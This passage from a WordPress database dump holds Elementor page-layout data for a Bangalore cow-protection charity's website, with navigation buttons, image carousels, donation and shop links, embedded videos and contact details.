namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11542,1918,'_elementor_page_assets','a:0:{}'),(11544,1919,'_elementor_edit_mode','builder'),(11545,1919,'_elementor_template_type','wp-page'),(11546,1919,'_elementor_version','3.7.8'),(11547,1919,'_wp_page_template','elementor_canvas'),(11548,1919,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11549,1919,'_elementor_page_assets','a:0:{}'),(11561,1921,'_elementor_edit_mode','builder'),(11562,1921,'_elementor_template_type','wp-page'),(11563,1921,'_elementor_version','3.7.8'),(11564,1921,'_wp_page_template','elementor_canvas'),(11565,1921,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp